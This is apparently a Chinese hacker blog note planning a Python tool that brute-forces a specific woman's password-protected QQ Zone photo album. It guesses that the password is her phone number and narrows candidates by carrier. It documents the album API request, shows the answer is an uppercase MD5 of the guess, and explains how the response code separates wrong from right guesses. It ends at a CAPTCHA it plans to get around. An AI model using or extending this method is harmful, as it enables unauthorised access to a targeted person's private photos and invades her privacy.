python渗透
计划写一个获取qq空间加密相册的工具。
分析:
她的相册密码是手机号,先写一个生成手机号的脚本
空间有她之前的手机号,那么她现在的手机号也极有可能是一样的运营商,比如移动(缩小密码范围)
自己新建一个加密相册,通过工具测试,看看成功或失败的response内容的差别。
扩展工具,可以进行多种密码类型的组合
记录:
https://h5.qzone.qq.com/proxy/domain/photo.qzone.qq.com/fcgi-bin/cgi_list_photo ?g_tk=238297171 &callback=shine3_Callback &t=247612204 &mode=0 &idcNum=4 &hostUin=xxx9883609 &topicId=V12sTtCU1D7iEU &noTopic=0 &uin=xxx3633125 &pageStart=0 &pageNum=1 &skipCmtCount=0 &singleurl=1 &batchId= ¬ice=0 &appid=4 &inCharset=utf-8 &outCharset=utf-8 &source=qzone &plat=qzone &outstyle=json &format=jsonp &json_esc=1 &question=%E6%89%8B%E6%9C%BA &answer=E10ADC3949BA59ABBE56E057F20F883E &callbackFun=shine3 &_=1510406853362
结果:
shine3_Callback({
"code":-10805,
"subcode":-10805,
"message":"对不起,回答错误",
"notice":0,
"time":1510406993,
"tips":"2A93-540",
"data":{
"priv" : 5,
"question" : "手机",
"t" : "247612204"
}
}
);
&question=%E6%89%8B%E6%9C%BA (手机)
&answer=E10ADC3949BA59ABBE56E057F20F883E(123456)
answer是md5加密
工具:http://www.cmd5.com/
输入正确的密码,得到:adadacb7c2658e921758d3c4bf90765d
转大写:https://bigtosmall.51240.com/
ADADACB7C2658E921758D3C4BF90765D
替换之前错误的,返回结果:
shine3_Callback({
"code":0,
"subcode":0,
"message":"",
"default":0,
"data":
{
"limit" : 0,
"photoList" : [
{
"batchId" : "1510404687051",
"browser" : 0,
"cameratype" : " ",
"cp_flag" : false,
"cp_x" : 540,
"cp_y" : 822,
"desc" : "",
"exif" : {
"exposureCompensation" : "",
"exposureMode" : "",
"exposureProgram" : "",
"exposureTime" : "",
"flash" : "",
"fnumber" : "",
"focalLength" : "",
"iso" : "",
"lensModel" : "",
"make" : "",
"meteringMode" : "",
"model" : "",
"originalTime" : ""
},
"forum" : 0,
"frameno" : 0,
"height" : 1920,
"id" : 0,
"is_video" : false,
"is_weixin_mode" : 0,
"ismultiup" : 0,
"lloc" : "NDR02be2ojjyBloPIfkr8gAAAAAAAAA!",
"modifytime" : 1510404664,
"name" : "2017-11-11",
"origin" : 0,
"origin_upload" : 0,
"origin_url" : "",
"owner" : "xxx9883609",
"ownername" : "xxx9883609",
"photocubage" : 16930,
"phototype" : 17,
"picmark_flag" : 0,
"picrefer" : 66,
"platformId" : 52,
"platformSubId" : 2,
"poiName" : "",
"pre" : "http:\/\/b242.photo.store.qq.com\/psbe?\/V12sTtCU1D7iEU\/oAaS.Z7tyAdknNEKQ4Q0GA3.hQnCs9Y0Qj1oL6LMm.h*f98*I9KDIQPU7uIDVz7i\/a\/dPIAAAAAAAAA&bo=OASABwAAAAARB4s!",
"raw" : "",
"raw_upload" : 0,
"rawshoottime" : "2017-11-08 14:24:07",
"shoottime" : "2017-11-08 ",
"shorturl" : "",
"sloc" : "NDR02be2ojjyBloPIfkr8gAAAAAAAAA!",
"tag" : "",
"uploadtime" : "2017-11-11 20:51:04",
"url" : "http:\/\/b242.photo.store.qq.com\/psbe?\/V12sTtCU1D7iEU\/oAaS.Z7tyAdknNEKQ4Q0GA3.hQnCs9Y0Qj1oL6LMm.h*f98*I9KDIQPU7uIDVz7i\/b\/dPIAAAAAAAAA&bo=OASABwAAAAARB4s!",
"width" : 1080,
"yurl" : 0
}
],
"t" : "247612204",
"topic" : {
"bitmap" : "10000010",
"browser" : 0,
"classid" : 106,
"comment" : 1,
"cover_id" : "NDR02be2ojjyBloPIfkr8gAAAAAAAAA!",
"createtime" : 1510404663,
"desc" : "",
"handset" : 0,
"id" : "V12sTtCU1D7iEU",
"is_share_album" : 0,
"lastuploadtime" : 1510404703,
"modifytime" : 1510406803,
"name" : "2017.11.11",
"ownerName" : "xxx9883609",
"ownerUin" : "xxx9883609",
"pre" : "http:\/\/b242.photo.store.qq.com\/psbe?\/V12sTtCU1D7iEU\/5RnntLai7oEQE6i*OnXeN8nUGyyqEZCHil*JmmZ1rCnbXCVtjR9Cg8QqrISTQ3Wt\/a\/dPIAAAAAAAAA",
"priv" : 5,
"pypriv" : 3,
"share_album_owner" : 0,
"total" : 10,
"url" : "http:\/\/b242.photo.store.qq.com\/psbe?\/V12sTtCU1D7iEU\/5RnntLai7oEQE6i*OnXeN8nUGyyqEZCHil*JmmZ1rCnbXCVtjR9Cg8QqrISTQ3Wt\/b\/dPIAAAAAAAAA",
"viewtype" : 2
返回正确的结果了。
我们可以通过shine3_Callback的code 的值判断密码的正误。
当然,现实怎么会如此美好,当我尝试多次后发现有验证码,腾讯考虑的真TMD周到!
关于怎么获取验证码还需要研究下。待续。。。
